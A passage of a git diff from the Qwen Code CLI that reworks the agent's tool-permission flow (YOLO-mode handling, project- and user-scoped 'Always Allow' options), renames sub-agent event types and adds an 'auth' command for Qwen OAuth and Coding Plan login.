wait targets us. this.pendingPrompt?.abort(); const pendingSend = new AbortController(); this.pendingPrompt = pendingSend; + // Wait for the previous prompt to finish so chat history is consistent. + if (this.pendingPromptCompletion) { + try { + await this.pendingPromptCompletion; + } catch { + // Expected: previous prompt was cancelled or errored + } + } + + // Cancelled while waiting for the previous prompt to finish. + if (pendingSend.signal.aborted) { + return { stopReason: 'cancelled' }; + } + + // Track this prompt's completion for the next prompt to await + let resolveCompletion!: () => void; + this.pendingPromptCompletion = new Promise((resolve) => { + resolveCompletion = resolve; + }); + + try { + return await this.#executePrompt(params, pendingSend); + } finally { + resolveCompletion(); + } + } + + async #executePrompt( + params: PromptRequest, + pendingSend: AbortController, + ): Promise { // Increment turn counter for each user prompt this.turn += 1; @@ -489,7 +531,7 @@ export class Session implements SessionContext { // Access eventEmitter from TaskTool invocation const taskEventEmitter = ( invocation as { - eventEmitter: SubAgentEventEmitter; + eventEmitter: AgentEventEmitter; } ).eventEmitter; @@ -498,7 +540,7 @@ export class Session implements SessionContext { const subagentType = (args['subagent_type'] as string) ?? ''; // Create a SubAgentTracker for this tool execution - const subAgentTracker = new SubAgentTracker( + const subSubAgentTracker = new SubAgentTracker( this, this.client, parentToolCallId, @@ -506,24 +548,23 @@ export class Session implements SessionContext { ); // Set up sub-agent tool tracking - subAgentCleanupFunctions = subAgentTracker.setup( + subAgentCleanupFunctions = subSubAgentTracker.setup( taskEventEmitter, abortSignal, ); } - const confirmationDetails = - await invocation.shouldConfirmExecute(abortSignal); + // Use the new permission flow: getDefaultPermission + getConfirmationDetails + // ask_user_question must always go through confirmation even in YOLO mode + // so the user always has a chance to respond to questions. + const isAskUserQuestionTool = fc.name === ToolNames.ASK_USER_QUESTION; + const defaultPermission = + this.config.getApprovalMode() !== ApprovalMode.YOLO || + isAskUserQuestionTool + ? await invocation.getDefaultPermission() + : 'allow'; - // In YOLO mode, auto-approve everything except ask_user_question - // (the user must always have a chance to respond to questions) - const isAskUserQuestionTool = - confirmationDetails && confirmationDetails.type === 'ask_user_question'; - const effectiveConfirmationDetails = - this.config.getApprovalMode() === ApprovalMode.YOLO && - !isAskUserQuestionTool - ? false - : confirmationDetails; + const needsConfirmation = defaultPermission === 'ask'; // Check for plan mode enforcement - block non-read-only tools // but allow ask_user_question so users can answer clarification questions @@ -532,7 +573,7 @@ export class Session implements SessionContext { isPlanMode && !isExitPlanModeTool && !isAskUserQuestionTool && - effectiveConfirmationDetails + needsConfirmation ) { // In plan mode, block any tool that requires confirmation (write operations) return errorResponse( @@ -543,25 +584,35 @@ export class Session implements SessionContext { ); } - if (effectiveConfirmationDetails) { + if (defaultPermission === 'deny') { + return errorResponse( + new Error( + `Tool "${fc.name}" is denied: command substitution is not allowed for security reasons.`, + ), + ); + } + + if (needsConfirmation) { + const confirmationDetails = + await invocation.getConfirmationDetails(abortSignal); const content: ToolCallContent[] = []; - if (effectiveConfirmationDetails.type === 'edit') { + if (confirmationDetails.type === 'edit') { content.push({ type: 'diff', - path: effectiveConfirmationDetails.fileName, - oldText: effectiveConfirmationDetails.originalContent, - newText: effectiveConfirmationDetails.newContent, + path: confirmationDetails.fileName, + oldText: confirmationDetails.originalContent, + newText: confirmationDetails.newContent, }); } // Add plan content for exit_plan_mode - if (effectiveConfirmationDetails.type === 'plan') { + if (confirmationDetails.type === 'plan') { content.push({ type: 'content', content: { type: 'text', - text: effectiveConfirmationDetails.plan, + text: confirmationDetails.plan, }, }); } @@ -571,7 +622,7 @@ export class Session implements SessionContext { const params: RequestPermissionRequest = { sessionId: this.sessionId, - options: toPermissionOptions(effectiveConfirmationDetails), + options: toPermissionOptions(confirmationDetails), toolCall: { toolCallId: callId, status: 'pending', @@ -595,7 +646,7 @@ export class Session implements SessionContext { .nativeEnum(ToolConfirmationOutcome) .parse(output.outcome.optionId); - await effectiveConfirmationDetails.onConfirm(outcome, { + await confirmationDetails.onConfirm(outcome, { answers: output.answers, }); @@ -611,6 +662,8 @@ export class Session implements SessionContext { ); case ToolConfirmationOutcome.ProceedOnce: case ToolConfirmationOutcome.ProceedAlways: + case ToolConfirmationOutcome.ProceedAlwaysProject: + case ToolConfirmationOutcome.ProceedAlwaysUser: case ToolConfirmationOutcome.ProceedAlwaysServer: case ToolConfirmationOutcome.ProceedAlwaysTool: case ToolConfirmationOutcome.ModifyWithEditor: @@ -1000,8 +1053,13 @@ function toPermissionOptions( case 'exec': return [ { - optionId: ToolConfirmationOutcome.ProceedAlways, - name: `Always Allow ${confirmation.rootCommand}`, + optionId: ToolConfirmationOutcome.ProceedAlwaysProject, + name: `Always Allow in project: ${confirmation.rootCommand}`, + kind: 'allow_always', + }, + { + optionId: ToolConfirmationOutcome.ProceedAlwaysUser, + name: `Always Allow for user: ${confirmation.rootCommand}`, kind: 'allow_always', }, ...basicPermissionOptions, @@ -1009,13 +1067,13 @@ function toPermissionOptions( case 'mcp': return [ { - optionId: ToolConfirmationOutcome.ProceedAlwaysServer, - name: `Always Allow ${confirmation.serverName}`, + optionId: ToolConfirmationOutcome.ProceedAlwaysProject, + name: `Always Allow in project: ${confirmation.toolName}`, kind: 'allow_always', }, { - optionId: ToolConfirmationOutcome.ProceedAlwaysTool, - name: `Always Allow ${confirmation.toolName}`, + optionId: ToolConfirmationOutcome.ProceedAlwaysUser, + name: `Always Allow for user: ${confirmation.toolName}`, kind: 'allow_always', }, ...basicPermissionOptions, @@ -1023,8 +1081,13 @@ function toPermissionOptions( case 'info': return [ { - optionId: ToolConfirmationOutcome.ProceedAlways, - name: `Always Allow`, + optionId: ToolConfirmationOutcome.ProceedAlwaysProject, + name: `Always Allow in project`, + kind: 'allow_always', + }, + { + optionId: ToolConfirmationOutcome.ProceedAlwaysUser, + name: `Always Allow for user`, kind: 'allow_always', }, ...basicPermissionOptions, diff --git a/packages/cli/src/acp-integration/session/SubAgentTracker.test.ts b/packages/cli/src/acp-integration/session/SubAgentTracker.test.ts index 86832afdd..0be126ff4 100644 --- a/packages/cli/src/acp-integration/session/SubAgentTracker.test.ts +++ b/packages/cli/src/acp-integration/session/SubAgentTracker.test.ts @@ -10,26 +10,26 @@ import type { SessionContext } from './types.js'; import type { Config, ToolRegistry, - SubAgentEventEmitter, - SubAgentToolCallEvent, - SubAgentToolResultEvent, - SubAgentApprovalRequestEvent, - SubAgentStreamTextEvent, + AgentEventEmitter, + AgentToolCallEvent, + AgentToolResultEvent, + AgentApprovalRequestEvent, + AgentStreamTextEvent, ToolEditConfirmationDetails, ToolInfoConfirmationDetails, } from '@qwen-code/qwen-code-core'; import { - SubAgentEventType, + AgentEventType, ToolConfirmationOutcome, TodoWriteTool, } from '@qwen-code/qwen-code-core'; import type { AgentSideConnection } from '@agentclientprotocol/sdk'; import { EventEmitter } from 'node:events'; -// Helper to create a mock SubAgentToolCallEvent with required fields +// Helper to create a mock AgentToolCallEvent with required fields function createToolCallEvent( - overrides: Partial & { name: string; callId: string }, -): SubAgentToolCallEvent { + overrides: Partial & { name: string; callId: string }, +): AgentToolCallEvent { return { subagentId: 'test-subagent', round: 1, @@ -40,14 +40,14 @@ function createToolCallEvent( }; } -// Helper to create a mock SubAgentToolResultEvent with required fields +// Helper to create a mock AgentToolResultEvent with required fields function createToolResultEvent( - overrides: Partial & { + overrides: Partial & { name: string; callId: string; success: boolean; }, -): SubAgentToolResultEvent { +): AgentToolResultEvent { return { subagentId: 'test-subagent', round: 1, @@ -56,15 +56,15 @@ function createToolResultEvent( }; } -// Helper to create a mock SubAgentApprovalRequestEvent with required fields +// Helper to create a mock AgentApprovalRequestEvent with required fields function createApprovalEvent( - overrides: Partial & { + overrides: Partial & { name: string; callId: string; - confirmationDetails: SubAgentApprovalRequestEvent['confirmationDetails']; - respond: SubAgentApprovalRequestEvent['respond']; + confirmationDetails: AgentApprovalRequestEvent['confirmationDetails']; + respond: AgentApprovalRequestEvent['respond']; }, -): SubAgentApprovalRequestEvent { +): AgentApprovalRequestEvent { return { subagentId: 'test-subagent', round: 1, @@ -102,10 +102,10 @@ function createInfoConfirmation( }; } -// Helper to create a mock SubAgentStreamTextEvent with required fields +// Helper to create a mock AgentStreamTextEvent with required fields function createStreamTextEvent( - overrides: Partial & { text: string }, -): SubAgentStreamTextEvent { + overrides: Partial & { text: string }, +): AgentStreamTextEvent { return { subagentId: 'test-subagent', round: 1, @@ -120,7 +120,7 @@ describe('SubAgentTracker', () => { let sendUpdateSpy: ReturnType; let requestPermissionSpy: ReturnType; let tracker: SubAgentTracker; - let eventEmitter: SubAgentEventEmitter; + let eventEmitter: AgentEventEmitter; let abortController: AbortController; beforeEach(() => { @@ -151,7 +151,7 @@ describe('SubAgentTracker', () => { 'parent-call-123', 'test-subagent', ); - eventEmitter = new EventEmitter() as unknown as SubAgentEventEmitter; + eventEmitter = new EventEmitter() as unknown as AgentEventEmitter; abortController = new AbortController(); }); @@ -169,19 +169,19 @@ describe('SubAgentTracker', () => { tracker.setup(eventEmitter, abortController.signal); expect(onSpy).toHaveBeenCalledWith( - SubAgentEventType.TOOL_CALL, + AgentEventType.TOOL_CALL, expect.any(Function), ); expect(onSpy).toHaveBeenCalledWith( - SubAgentEventType.TOOL_RESULT, + AgentEventType.TOOL_RESULT, expect.any(Function), ); expect(onSpy).toHaveBeenCalledWith( - SubAgentEventType.TOOL_WAITING_APPROVAL, + AgentEventType.TOOL_WAITING_APPROVAL, expect.any(Function), ); expect(onSpy).toHaveBeenCalledWith( - SubAgentEventType.STREAM_TEXT, + AgentEventType.STREAM_TEXT, expect.any(Function), ); }); @@ -193,19 +193,19 @@ describe('SubAgentTracker', () => { cleanups[0](); expect(offSpy).toHaveBeenCalledWith( - SubAgentEventType.TOOL_CALL, + AgentEventType.TOOL_CALL, expect.any(Function), ); expect(offSpy).toHaveBeenCalledWith( - SubAgentEventType.TOOL_RESULT, + AgentEventType.TOOL_RESULT, expect.any(Function), ); expect(offSpy).toHaveBeenCalledWith( - SubAgentEventType.TOOL_WAITING_APPROVAL, + AgentEventType.TOOL_WAITING_APPROVAL, expect.any(Function), ); expect(offSpy).toHaveBeenCalledWith( - SubAgentEventType.STREAM_TEXT, + AgentEventType.STREAM_TEXT, expect.any(Function), ); }); @@ -222,7 +222,7 @@ describe('SubAgentTracker', () => { description: 'Reading file', }); - eventEmitter.emit(SubAgentEventType.TOOL_CALL, event); + eventEmitter.emit(AgentEventType.TOOL_CALL, event); // Allow async operations to complete await vi.waitFor(() => { @@ -258,7 +258,7 @@ describe('SubAgentTracker', () => { args: { todos: [] }, }); - eventEmitter.emit(SubAgentEventType.TOOL_CALL, event); + eventEmitter.emit(AgentEventType.TOOL_CALL, event); // Give time for any async operation await new Promise((resolve) => setTimeout(resolve, 10)); @@ -276,7 +276,7 @@ describe('SubAgentTracker', () => { args: {}, }); - eventEmitter.emit(SubAgentEventType.TOOL_CALL, event); + eventEmitter.emit(AgentEventType.TOOL_CALL, event); await new Promise((resolve) => setTimeout(resolve, 10)); @@ -290,7 +290,7 @@ describe('SubAgentTracker', () => { // First emit tool call to store state eventEmitter.emit( - SubAgentEventType.TOOL_CALL, + AgentEventType.TOOL_CALL, createToolCallEvent({ name: 'read_file', callId: 'call-123', @@ -306,7 +306,7 @@ describe('SubAgentTracker', () => { resultDisplay: 'File contents', }); - eventEmitter.emit(SubAgentEventType.TOOL_RESULT, resultEvent); + eventEmitter.emit(AgentEventType.TOOL_RESULT, resultEvent); await vi.waitFor(() => { expect(sendUpdateSpy).toHaveBeenCalledWith( @@ -334,7 +334,7 @@ describe('SubAgentTracker', () => { resultDisplay: undefined, }); - eventEmitter.emit(SubAgentEventType.TOOL_RESULT, resultEvent); + eventEmitter.emit(AgentEventType.TOOL_RESULT, resultEvent); await vi.waitFor(() => { expect(sendUpdateSpy).toHaveBeenCalledWith( @@ -356,7 +356,7 @@ describe('SubAgentTracker', () => { // Store args via tool call eventEmitter.emit( - SubAgentEventType.TOOL_CALL, + AgentEventType.TOOL_CALL, createToolCallEvent({ name: TodoWriteTool.Name, callId: 'call-todo', @@ -377,7 +377,7 @@ describe('SubAgentTracker', () => { }), }); - eventEmitter.emit(SubAgentEventType.TOOL_RESULT, resultEvent); + eventEmitter.emit(AgentEventType.TOOL_RESULT, resultEvent); await vi.waitFor(() => { expect(sendUpdateSpy).toHaveBeenCalledWith({ @@ -393,7 +393,7 @@ describe('SubAgentTracker', () => { tracker.setup(eventEmitter, abortController.signal); eventEmitter.emit( - SubAgentEventType.TOOL_CALL, + AgentEventType.TOOL_CALL, createToolCallEvent({ name: 'test_tool', callId: 'call-cleanup', @@ -402,7 +402,7 @@ describe('SubAgentTracker', () => { ); eventEmitter.emit( - SubAgentEventType.TOOL_RESULT, + AgentEventType.TOOL_RESULT, createToolResultEvent({ name: 'test_tool', callId: 'call-cleanup', @@ -413,7 +413,7 @@ describe('SubAgentTracker', () => { // Emit another result for same callId - should not have stored args sendUpdateSpy.mockClear(); eventEmitter.emit( - SubAgentEventType.TOOL_RESULT, + AgentEventType.TOOL_RESULT, createToolResultEvent({ name: 'test_tool', callId: 'call-cleanup', @@ -447,7 +447,7 @@ describe('SubAgentTracker', () => { respond: respondSpy, }); - eventEmitter.emit(SubAgentEventType.TOOL_WAITING_APPROVAL, event); + eventEmitter.emit(AgentEventType.TOOL_WAITING_APPROVAL, event); await vi.waitFor(() => { expect(requestPermissionSpy).toHaveBeenCalled(); @@ -483,7 +483,7 @@ describe('SubAgentTracker', () => { respond: respondSpy, }); - eventEmitter.emit(SubAgentEventType.TOOL_WAITING_APPROVAL, event); + eventEmitter.emit(AgentEventType.TOOL_WAITING_APPROVAL, event); await vi.waitFor(() => { expect(respondSpy).toHaveBeenCalledWith( @@ -504,7 +504,7 @@ describe('SubAgentTracker', () => { respond: respondSpy, }); - eventEmitter.emit(SubAgentEventType.TOOL_WAITING_APPROVAL, event); + eventEmitter.emit(AgentEventType.TOOL_WAITING_APPROVAL, event); await vi.waitFor(() => { expect(respondSpy).toHaveBeenCalledWith(ToolConfirmationOutcome.Cancel); @@ -525,7 +525,7 @@ describe('SubAgentTracker', () => { respond: respondSpy, }); - eventEmitter.emit(SubAgentEventType.TOOL_WAITING_APPROVAL, event); + eventEmitter.emit(AgentEventType.TOOL_WAITING_APPROVAL, event); await vi.waitFor(() => { expect(respondSpy).toHaveBeenCalledWith(ToolConfirmationOutcome.Cancel); @@ -548,7 +548,7 @@ describe('SubAgentTracker', () => { respond: vi.fn(), }); - eventEmitter.emit(SubAgentEventType.TOOL_WAITING_APPROVAL, event); + eventEmitter.emit(AgentEventType.TOOL_WAITING_APPROVAL, event); await vi.waitFor(() => { expect(requestPermissionSpy).toHaveBeenCalled(); @@ -572,7 +572,7 @@ describe('SubAgentTracker', () => { text: 'Hello, this is a response from the model.', }); - eventEmitter.emit(SubAgentEventType.STREAM_TEXT, event); + eventEmitter.emit(AgentEventType.STREAM_TEXT, event); await vi.waitFor(() => { expect(sendUpdateSpy).toHaveBeenCalled(); @@ -593,15 +593,15 @@ describe('SubAgentTracker', () => { tracker.setup(eventEmitter, abortController.signal); eventEmitter.emit( - SubAgentEventType.STREAM_TEXT, + AgentEventType.STREAM_TEXT, createStreamTextEvent({ text: 'First chunk ' }), ); eventEmitter.emit( - SubAgentEventType.STREAM_TEXT, + AgentEventType.STREAM_TEXT, createStreamTextEvent({ text: 'Second chunk ' }), ); eventEmitter.emit( - SubAgentEventType.STREAM_TEXT, + AgentEventType.STREAM_TEXT, createStreamTextEvent({ text: 'Third chunk' }), ); @@ -640,7 +640,7 @@ describe('SubAgentTracker', () => { text: 'This should not be emitted', }); - eventEmitter.emit(SubAgentEventType.STREAM_TEXT, event); + eventEmitter.emit(AgentEventType.STREAM_TEXT, event); await new Promise((resolve) => setTimeout(resolve, 10)); @@ -655,7 +655,7 @@ describe('SubAgentTracker', () => { thought: true, }); - eventEmitter.emit(SubAgentEventType.STREAM_TEXT, event); + eventEmitter.emit(AgentEventType.STREAM_TEXT, event); await vi.waitFor(() => { expect(sendUpdateSpy).toHaveBeenCalled(); @@ -680,7 +680,7 @@ describe('SubAgentTracker', () => { thought: false, }); - eventEmitter.emit(SubAgentEventType.STREAM_TEXT, event); + eventEmitter.emit(AgentEventType.STREAM_TEXT, event); await vi.waitFor(() => { expect(sendUpdateSpy).toHaveBeenCalled(); @@ -705,7 +705,7 @@ describe('SubAgentTracker', () => { text: 'Default behavior text.', }); - eventEmitter.emit(SubAgentEventType.STREAM_TEXT, event); + eventEmitter.emit(AgentEventType.STREAM_TEXT, event); await vi.waitFor(() => { expect(sendUpdateSpy).toHaveBeenCalled(); diff --git a/packages/cli/src/acp-integration/session/SubAgentTracker.ts b/packages/cli/src/acp-integration/session/SubAgentTracker.ts index acbe95082..6509b4a46 100644 --- a/packages/cli/src/acp-integration/session/SubAgentTracker.ts +++ b/packages/cli/src/acp-integration/session/SubAgentTracker.ts @@ -5,18 +5,18 @@ */ import type { - SubAgentEventEmitter, - SubAgentToolCallEvent, - SubAgentToolResultEvent, - SubAgentApprovalRequestEvent, - SubAgentUsageEvent, - SubAgentStreamTextEvent, + AgentEventEmitter, + AgentToolCallEvent, + AgentToolResultEvent, + AgentApprovalRequestEvent, + AgentUsageEvent, + AgentStreamTextEvent, ToolCallConfirmationDetails, AnyDeclarativeTool, AnyToolInvocation, } from '@qwen-code/qwen-code-core'; import { - SubAgentEventType, + AgentEventType, ToolConfirmationOutcome, createDebugLogger, } from '@qwen-code/qwen-code-core'; @@ -106,12 +106,12 @@ export class SubAgentTracker { /** * Sets up event listeners for a sub-agent's tool events. * - * @param eventEmitter - The SubAgentEventEmitter from TaskTool + * @param eventEmitter - The AgentEventEmitter from TaskTool * @param abortSignal - Signal to abort tracking if parent is cancelled * @returns Array of cleanup functions to remove listeners */ setup( - eventEmitter: SubAgentEventEmitter, + eventEmitter: AgentEventEmitter, abortSignal: AbortSignal, ): Array<() => void> { const onToolCall = this.createToolCallHandler(abortSignal); @@ -120,19 +120,19 @@ export class SubAgentTracker { const onUsageMetadata = this.createUsageMetadataHandler(abortSignal); const onStreamText = this.createStreamTextHandler(abortSignal); - eventEmitter.on(SubAgentEventType.TOOL_CALL, onToolCall); - eventEmitter.on(SubAgentEventType.TOOL_RESULT, onToolResult); - eventEmitter.on(SubAgentEventType.TOOL_WAITING_APPROVAL, onApproval); - eventEmitter.on(SubAgentEventType.USAGE_METADATA, onUsageMetadata); - eventEmitter.on(SubAgentEventType.STREAM_TEXT, onStreamText); + eventEmitter.on(AgentEventType.TOOL_CALL, onToolCall); + eventEmitter.on(AgentEventType.TOOL_RESULT, onToolResult); + eventEmitter.on(AgentEventType.TOOL_WAITING_APPROVAL, onApproval); + eventEmitter.on(AgentEventType.USAGE_METADATA, onUsageMetadata); + eventEmitter.on(AgentEventType.STREAM_TEXT, onStreamText); return [ () => { - eventEmitter.off(SubAgentEventType.TOOL_CALL, onToolCall); - eventEmitter.off(SubAgentEventType.TOOL_RESULT, onToolResult); - eventEmitter.off(SubAgentEventType.TOOL_WAITING_APPROVAL, onApproval); - eventEmitter.off(SubAgentEventType.USAGE_METADATA, onUsageMetadata); - eventEmitter.off(SubAgentEventType.STREAM_TEXT, onStreamText); + eventEmitter.off(AgentEventType.TOOL_CALL, onToolCall); + eventEmitter.off(AgentEventType.TOOL_RESULT, onToolResult); + eventEmitter.off(AgentEventType.TOOL_WAITING_APPROVAL, onApproval); + eventEmitter.off(AgentEventType.USAGE_METADATA, onUsageMetadata); + eventEmitter.off(AgentEventType.STREAM_TEXT, onStreamText); // Clean up any remaining states this.toolStates.clear(); }, @@ -146,7 +146,7 @@ export class SubAgentTracker { abortSignal: AbortSignal, ): (...args: unknown[]) => void { return (...args: unknown[]) => { - const event = args[0] as SubAgentToolCallEvent; + const event = args[0] as AgentToolCallEvent; if (abortSignal.aborted) return; // Look up tool and build invocation for metadata @@ -187,7 +187,7 @@ export class SubAgentTracker { abortSignal: AbortSignal, ): (...args: unknown[]) => void { return (...args: unknown[]) => { - const event = args[0] as SubAgentToolResultEvent; + const event = args[0] as AgentToolResultEvent; if (abortSignal.aborted) return; const state = this.toolStates.get(event.callId); @@ -215,7 +215,7 @@ export class SubAgentTracker { abortSignal: AbortSignal, ): (...args: unknown[]) => Promise { return async (...args: unknown[]) => { - const event = args[0] as SubAgentApprovalRequestEvent; + const event = args[0] as AgentApprovalRequestEvent; if (abortSignal.aborted) return; const state = this.toolStates.get(event.callId); @@ -292,7 +292,7 @@ export class SubAgentTracker { abortSignal: AbortSignal, ): (...args: unknown[]) => void { return (...args: unknown[]) => { - const event = args[0] as SubAgentUsageEvent; + const event = args[0] as AgentUsageEvent; if (abortSignal.aborted) return; this.messageEmitter.emitUsageMetadata( @@ -312,7 +312,7 @@ export class SubAgentTracker { abortSignal: AbortSignal, ): (...args: unknown[]) => void { return (...args: unknown[]) => { - const event = args[0] as SubAgentStreamTextEvent; + const event = args[0] as AgentStreamTextEvent; if (abortSignal.aborted) return; // Emit streamed text as agent message or thought based on the flag @@ -330,6 +330,8 @@ export class SubAgentTracker { private toPermissionOptions( confirmation: ToolCallConfirmationDetails, ): PermissionOption[] { + const hideAlwaysAllow = + 'hideAlwaysAllow' in confirmation && confirmation.hideAlwaysAllow; switch (confirmation.type) { case 'edit': return [ @@ -342,34 +344,56 @@ export class SubAgentTracker { ]; case 'exec': return [ - { - optionId: ToolConfirmationOutcome.ProceedAlways, - name: `Always Allow ${(confirmation as { rootCommand?: string }).rootCommand ?? 'command'}`, - kind: 'allow_always', - }, + ...(hideAlwaysAllow + ? [] + : [ + { + optionId: ToolConfirmationOutcome.ProceedAlwaysProject, + name: `Always Allow in project: ${(confirmation as { rootCommand?: string }).rootCommand ?? 'command'}`, + kind: 'allow_always' as const, + }, + { + optionId: ToolConfirmationOutcome.ProceedAlwaysUser, + name: `Always Allow for user: ${(confirmation as { rootCommand?: string }).rootCommand ?? 'command'}`, + kind: 'allow_always' as const, + }, + ]), ...basicPermissionOptions, ]; case 'mcp': return [ - { - optionId: ToolConfirmationOutcome.ProceedAlwaysServer, - name: `Always Allow ${(confirmation as { serverName?: string }).serverName ?? 'server'}`, - kind: 'allow_always', - }, - { - optionId: ToolConfirmationOutcome.ProceedAlwaysTool, - name: `Always Allow ${(confirmation as { toolName?: string }).toolName ?? 'tool'}`, - kind: 'allow_always', - }, + ...(hideAlwaysAllow + ? [] + : [ + { + optionId: ToolConfirmationOutcome.ProceedAlwaysProject, + name: `Always Allow in project: ${(confirmation as { toolName?: string }).toolName ?? 'tool'}`, + kind: 'allow_always' as const, + }, + { + optionId: ToolConfirmationOutcome.ProceedAlwaysUser, + name: `Always Allow for user: ${(confirmation as { toolName?: string }).toolName ?? 'tool'}`, + kind: 'allow_always' as const, + }, + ]), ...basicPermissionOptions, ]; case 'info': return [ - { - optionId: ToolConfirmationOutcome.ProceedAlways, - name: 'Always Allow', - kind: 'allow_always', - }, + ...(hideAlwaysAllow + ? [] + : [ + { + optionId: ToolConfirmationOutcome.ProceedAlwaysProject, + name: 'Always Allow in project', + kind: 'allow_always' as const, + }, + { + optionId: ToolConfirmationOutcome.ProceedAlwaysUser, + name: 'Always Allow for user', + kind: 'allow_always' as const, + }, + ]), ...basicPermissionOptions, ]; case 'plan': diff --git a/packages/cli/src/acp-integration/session/emitters/MessageEmitter.ts b/packages/cli/src/acp-integration/session/emitters/MessageEmitter.ts index 4b2bf82bf..c4e0b971c 100644 --- a/packages/cli/src/acp-integration/session/emitters/MessageEmitter.ts +++ b/packages/cli/src/acp-integration/session/emitters/MessageEmitter.ts @@ -5,6 +5,7 @@ */ import type { GenerateContentResponseUsageMetadata } from '@google/genai'; +import type { SubagentMeta } from '../types.js'; import type { Usage } from '@agentclientprotocol/sdk'; import { BaseEmitter } from './BaseEmitter.js'; @@ -77,7 +78,7 @@ export class MessageEmitter extends BaseEmitter { usageMetadata: GenerateContentResponseUsageMetadata, text: string = '', durationMs?: number, - subagentMeta?: import('../types.js').SubagentMeta, + subagentMeta?: SubagentMeta, ): Promise { const usage: Usage = { inputTokens: usageMetadata.promptTokenCount ?? 0, diff --git a/packages/cli/src/commands/auth.ts b/packages/cli/src/commands/auth.ts new file mode 100644 index 000000000..b90795bc7 --- /dev/null +++ b/packages/cli/src/commands/auth.ts @@ -0,0 +1,77 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +import type { CommandModule, Argv } from 'yargs'; +import { + handleQwenAuth, + runInteractiveAuth, + showAuthStatus, +} from './auth/handler.js'; +import { t } from '../i18n/index.js'; + +// Define subcommands separately +const qwenOauthCommand = { + command: 'qwen-oauth', + describe: t('Authenticate using Qwen OAuth'), + handler: async () => { + await handleQwenAuth('qwen-oauth', {}); + }, +}; + +const codePlanCommand = { + command: 'coding-plan', + describe: t('Authenticate using Alibaba Cloud Coding Plan'), + builder: (yargs: Argv) => + yargs + .option('region', { + alias: 'r', + describe: t('Region for Coding Plan (china/global)'), + type: 'string', + }) + .option('key', { + alias: 'k', + describe: t('API key for Coding Plan'), + type: 'string', + }), + handler: async (argv: { region?: string; key?: string }) => { + const region = argv['region'] as string | undefined; + const key = argv['key'] as string | undefined; + + // If region and key are provided, use them directly + if (region && key) { + await handleQwenAuth('coding-plan', { region, key }); + } else { + // Otherwise, prompt interactively + await handleQwenAuth('coding-plan', {}); + } + }, +}; + +const statusCommand = { + command: 'status', + describe: t('Show current authentication status'), + handler: async () => { + await showAuthStatus(); + }, +}; + +export const authCommand: CommandModule = { + command: 'auth', + describe: t( + 'Configure Qwen authentication information with Qwen-OAuth or Alibaba Cloud Coding Plan', + ), + builder: (yargs: Argv) => + yargs + .command(qwenOauthCommand) + .command(codePlanCommand) + .command(statusCommand) + .demandCommand(0) // Don't require a subcommand + .version(false), + handler: async () => { + // This handler is for when no subcommand is provided - show interactive menu + await runInteractiveAuth(); + }, +}; diff --git a/packages/cli/src/commands/auth/handler.ts b/packages/cli/src/commands/auth/handler.ts new file mode 100644 index 000000000..1d03e9860 --- /dev/null +++ b/packages/cli/src/commands/auth/handler.ts @@ -0,0 +1,500 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +import { + AuthType, + getErrorMessage, + type Config, + type ProviderModelConfig as ModelConfig, +} from '@qwen-code/qwen-code-core'; +import { writeStdoutLine, writeStderrLine } from '../../utils/stdioHelpers.js'; +import { t } from '../../i18n/index.js'; +import { + getCodingPlanConfig, + isCodingPlanConfig, + CodingPlanRegion, + CODING_PLAN_ENV_KEY, +} from '../../constants/codingPlan.js'; +import { getPersistScopeForModelSelection } from '../../config/modelProvidersScope.js'; +import { backupSettingsFile } from '../../utils/settingsUtils.js'; +import { loadSettings, type LoadedSettings } from '../../config/settings.js'; +import { loadCliConfig } from '../../config/config.js'; +import type { CliArgs } from '../../config/config.js'; +import { InteractiveSelector } from './interactiveSelector.js'; + +interface QwenAuthOptions { + region?: string; + key?: string; +} + +interface CodingPlanSettings { + region?: CodingPlanRegion; + version?: string; +} + +interface MergedSettingsWithCodingPlan { + security?: { + auth?: { + selectedType?: string; + }; + }; + codingPlan?: CodingPlanSettings; + model?: { + name?: string; + }; + modelProviders?: Record; + env?: Record; +} + +/** + * Handles the authentication process based on the specified command and options + */ +export async function handleQwenAuth( + command: 'qwen-oauth' | 'coding-plan', + options: QwenAuthOptions, +) { + try { + const settings = loadSettings(); + + // Create a minimal argv for config loading + const minimalArgv: CliArgs = { + query: undefined, + model: undefined, + sandbox: undefined, + sandboxImage: undefined, + debug: undefined, + prompt: undefined, + promptInteractive: undefined, + yolo: undefined, + approvalMode: undefined, + telemetry: undefined, + checkpointing: undefined, + telemetryTarget: undefined, + telemetryOtlpEndpoint: undefined, + telemetryOtlpProtocol: undefined, + telemetryLogPrompts: undefined, + telemetryOutfile: undefined, + allowedMcpServerNames: undefined, + allowedTools: undefined, + acp: undefined, + experimentalAcp: undefined, + experimentalLsp: undefined, + experimentalHooks: undefined, + extensions: [], + listExtensions: undefined, + openaiLogging: undefined, + openaiApiKey: undefined, + openaiBaseUrl: undefined, + openaiLoggingDir: undefined, + proxy: undefined, + includeDirectories: undefined, + tavilyApiKey: undefined, + googleApiKey: undefined, + googleSearchEngineId: undefined, + webSearchDefault: undefined, + screenReader: undefined, + inputFormat: undefined, + outputFormat: undefined, + includePartialMessages: undefined, + chatRecording: undefined, + continue: undefined, + resume: undefined, + sessionId: undefined, + maxSessionTurns: undefined, + coreTools: undefined, + excludeTools: undefined, + authType: undefined, + channel: undefined, + systemPrompt: undefined, + appendSystemPrompt: undefined, + }; + + // Create a minimal config to access settings and storage + const config = await loadCliConfig( + settings.merged, + minimalArgv, + process.cwd(), + [], // No extensions for auth command + ); + + if (command === 'qwen-oauth') { + await handleQwenOAuth(config, settings); + } else if (command === 'coding-plan') { + await handleCodePlanAuth(config, settings, options); + } + + // Exit after authentication is complete + writeStdoutLine(t('Authentication completed successfully.')); + process.exit(0); + } catch (error) { + writeStderrLine(getErrorMessage(error)); + process.exit(1); + } +} + +/** + * Handles Qwen OAuth authentication + */ +async function handleQwenOAuth( + config: Config, + settings: LoadedSettings, +): Promise { + writeStdoutLine(t('Starting Qwen OAuth authentication...')); + + try { + await config.refreshAuth(AuthType.QWEN_OAUTH); + + // Persist the auth type + const authTypeScope = getPersistScopeForModelSelection(settings); + settings.setValue( + authTypeScope, + 'security.auth.selectedType', + AuthType.QWEN_OAUTH, + ); + + writeStdoutLine(t('Successfully authenticated with Qwen OAuth.')); + process.exit(0); + } catch (error) { + writeStderrLine( + t('Failed to authenticate with Qwen OAuth: {{error}}', { + error: getErrorMessage(error), + }), + ); + process.exit(1); + } +} + +/** + * Handles Alibaba Cloud Coding Plan authentication + */ +async function 